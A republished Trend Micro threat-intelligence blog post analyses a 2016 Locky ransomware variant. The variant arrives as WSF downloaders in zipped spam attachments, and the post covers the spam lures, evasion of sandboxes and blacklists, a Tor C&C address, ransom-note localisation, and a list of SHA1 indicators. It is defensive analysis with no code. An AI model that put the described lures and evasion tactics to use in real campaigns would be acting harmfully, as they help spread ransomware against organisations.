New Locky Ransomware Spotted in the Brazilian Underground Market, Uses Windows Script Files

Like a game of cat and mouse, the perpetrators behind the Locky ransomware had updated their arsenal yet again with a new tactic—using Windows Scripting File (WSF) for the arrival method. WSF is a file that allows the combination of multiple scripting languages within a single file. Using WSF makes the detection and analysis of ransomware challenging since WSF files are not among the list of typical files that traditional endpoint solutions monitor for malicious activity.

However, the use of WSF files is no longer a novel idea since the same tactic was used in Cerber’s email campaign in May 2016. It would seem that the attackers behind Locky followed Cerber in using WSF files after seeing how such a tactic was successful in bypassing security measures like sandbox and blacklisting technologies.

Arrival method and social engineering lures

For the entry point, this Locky variant uses spam emails with .ZIP file attachments that contain WSF files.  With email subject lines such as, “bank account record”, “annual report” and “company database” we believe that attackers are possibly targeting companies. We also noticed how most of these spammed emails were sent between 9 a.m. – 11 a.m. (UTC), a time when employees in European countries are starting their day at work. In addition, our data showed that  there had been a high volume of spam runs during the weekdays and then a decreased volume during the weekends.


Figure 1. Sample of a spammed email message


Figure 2. Volume of spam emails with WSF attachments (July 13-Aug 3, 2016)


Figure 3. Number of spam emails sent per hour from July 25-29, 2016

Interestingly, we found a spam sample with the subject, “Voicemail from Anonymous.” This could mean that cybercriminals are taking advantage of the popularity of Anonymous. On the other hand,“Anonymous” could also simply refer to an unknown person.


Figure 4. Spammed email with the subject, Voicemail from Anonymous

The first wave of this spam campaign was seen on July 15—with each email originating from different IP addresses. The countries that sent out the initial spam run were Serbia, Colombia, and Vietnam. Then another wave of spam runs were seen on July 18 and 19, with emails coming from countries such as Thailand and Brazil.

Why WSF?

The WSF files are employed as downloaders of the actual ransomware. Such a technique allows this threat to bypass security measures, including sandbox analysis, since it has no static file type. In addition, using blended scripting languages could result to the samples being encoded, making these arduous to analyze.

Similar with using VBScript and JavaScript, WSF makes it possible for attackers to download any malware payload. In the case of Locky, the actual ransomware downloaded by these WSF files have different hashes. When  downloaded files have different hashes, detecting them via blacklisting becomes difficult.  The samples we analyzed have properties of a “Yahoo Widget” file to pass it off as legitimate.


Figure 5. This malware has properties posing as a Yahoo Widget.


Figure 6. The ransomware downloaded by WSF has different file names and hashes.

Probing deeper into the threat

Analysis of this ransomware shows how it uses a registry key to determine the system’s language before displaying the ransom notes. For example, if the default machine language is English, then it shows ransom notes in English. This particular behavior of primarily determining the system’s language was also seen in JIGSAW and CRYPTLOCK, as well as in Police ransomware or REVETON.


Figure 7. This malware queries the machine language before displaying the ransom notes.


Figure 8.  Ransom notes in English


Figure 9. Ransom notes in Brazilian Portuguese

For the command-and-control (C&C) communication, this threat used the SSH protocol or openVPN to encrypt the network traffic. One of the C&C servers is from the Deep Web via the Tor site, zjfq4lnfbs7pncr5[.]onion[.]to.

Like any Locky variants, the file extension is changed to .ZEPTO after all the files are encrypted. In addition, Locky also uses native APIs to change the file extension to .ZEPTO.

The developers of this new Locky variant seem to be coming from Brazil as we were able to spot this threat being sold in the Brazilian underground market. We also found someone (with the alias unknown_antisec) using Facebook to share this blog post (originally posted in Trend Micro blog in Brazil) that discussed our findings about the Brazilian underground. That particular user also included a caption in Brazilian Portuguese that can be translated to, “Sup dog, they’ve got you ransomware.” Brazilian cybercriminals typically use social media or the surface web to advertise their products and services.

A multilayered defense strategy

Locky ransomware continues to evolve—from using macros, JavaScript and VBScript to WSF. With this file type, it can, by default, combine any scripting language like JScript, which was previously used by RAA for obfuscation purposes.

Due to the possibility that WSF files can bypass traditional bypass and sandbox analysis, it is best to stop this new breed of Locky at the exposure layer. We are able to protect our customers at the gateway level by detecting Locky-related spam emails and stripping the emails with WSF attachments –thus preventing the malicious file from executing. Our sandbox is also capable of preventing the malware from running on the system since these new tactics associated with ransomware had already been detected.

Trend Micro offers solutions that protect users and organizations in all aspects –at the gateway, endpoints, networks, and even servers.


  • Endpoint Protection

    Trend Micro Smart Protection Suites detects and stops suspicious behavior and exploits associated with ransomware at the endpoint level.

    Ransomware Behavior Monitoring
    Application Control
    Vulnerability Shielding
    Web Security
  • Network Protection

    Trend Micro Deep Discovery Inspector detects malicious traffic, communications, and other activities associated with attempts to inject ransomware into the network.

    Network Traffic Scanning
    Malware Sandbox
    Lateral Movement Prevention
  • Server Protection

    Trend Micro Deep Security™ detects and stops suspicious network activity and shields servers and applications from exploits.

    Webserver Protection
    Vulnerability Shielding
    Lateral Movement Prevention


  • Protection for Home Users

    Trend Micro Security 10 provides robust protection against ransomware by blocking malicious websites, emails, and files associated with this threat.

    IP/Web Reputation
    Ransomware Protection

Related SHA1 hashes: 


  • 0A17D419461F2A7A722F4E15C2760D182626E698
  • 0B4396BD30F65B74CE38F7F8F6B7BC1E451FBCCC
  • 0C82F9EBC4ACE5D6FD62C04972CF6A56AA022BFD
  • 21DCA77E6EF9E89C788EE0B592C22F5448DE2762
  • 288C7C4FA2FC2A36E532F938B1DC18E4918A0E36
  • 69DA16CB954E8E48CEA4B64A6BBC267ED01AB2B3
  • 6A9B6AE21C5F5E560591B73D0049F6CA2D720122
  • 752AB2146016BCAFBFE17F710D61D3AD3822F849
  • 8BDC38B005E09B34C1BCE94529158DE75408E905
  • B8B79E8BAF39E0E7616170216B25C1505974F42C
  • 5994eb7696e11818d01bc7447adcf9ec5c1c5f13
  • 936ac2f42a1a641d52ba8078c42f5879e2dd41a0
  • 0b7b2ba3c35e334bf5bc13929c77ecaf51758e2b
  • 3bc8656186ee93d25173ba0f3c07a9cced23e7cd
  • 08f1565514122c578da05cbf8b50ee9dcfa41af6
  • 4641fb72aaf1461401490eaf1916de4103bbece5
  • 3790c8bc8e691c79d80e458ba5e5c80b0b12a0c8
  • 91762a5406e5291837ed259cd840cf4d22a2ddfa
  • 005cc479faa2324625365bde7771096683312737
  • eb01089b3625d56d50e8768e94cfef1c84c25601


  • 812FBF9E30A7B86C4A72CCA66E1D2FC57344BB09
  • AE78A7B67CB5D3C92406CFA9F5FB38ADC8015FDF
  • 0e76d8fd54289043012a917148dacda0730e4d88
  • c76222e1206bad8e9a4a6f4867b2e235638a4c4c


  • A2420F7806B3E00DB9608ABF80EE91A2447F68AD
  • A94CE98BCC9A130AA88E9655672497C701BDA4A5
  • fc591d83cdebe57b60588f59466ec3b12283cc2c
  • 719f0d406038b932805d338f929d12c899ec97e1


  • DA0FD77C60A2C9A53985A096BDAE1BEF89034A01
  • 56dd1d2b944dae25e87a2f9b7d6c653b2ece4486


  • 180BDD12C3EE6D8F0A2D47DDAAD5A2DAA513883E
  • 2C62F7B01DD423CEF488100F7C0CA440194657D9
  • 6DECCBB36F4E83834985FE49FC235683CF90F054
  • E2D94F69134D97C71F2B70FC0A3558B30637E46D
  • E3E49BF06CD03FB0EA687507931927E32E0A5A1C


  • 22DE960D38310643C3E68C2BA8EC68D855B43EBD


  • 5A044104A6EED7E343814B3E0FC2DB535C515EA2
  • 9BA7499C98E2B52303912352E1ACA694552E0E86
  • 9F48FA841FC8B0E945C43DB5B18B37BDF2DA8F5B


  • 3329FB8FD5E664CCDE59E12E608E0BCE3EF95225
  • 5BE1DE4A018B746953381EA400278D25E7C3D024
  • B2D1E7860F617014E0546B9D48450F221FE118EC
  • BB8ABA09BC9B97C7358B62F2FF016D05955A5967


  • 1A46C45A443B1C10EAA9AA317CD343B83160828F
  • A2899353B237E08A7570C674D05D326D43173231
  • D8FF29CFF5341B361CA3CEE67EABBD22698DAA2B


  • 565951232E4A1D491D932C916BC534E8FB02B29B


  • E362B04FE7F26663D7D43DD829D3C4310B2FC699


  • 6014A6AFDF09EDEB927A9A6A4E0DF591D72B1899
  • DCDB228D515F08673542B89ABB86F36B3B134D72

Additional insights and data by Franklynn Uy and Jon Oliver

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

New Locky Ransomware Spotted in the Brazilian Underground Market, Uses Windows Script Files

Read more: New Locky Ransomware Spotted in the Brazilian Underground Market, Uses Windows Script Files

Story added 15. August 2016, content source with full text you can find at link above.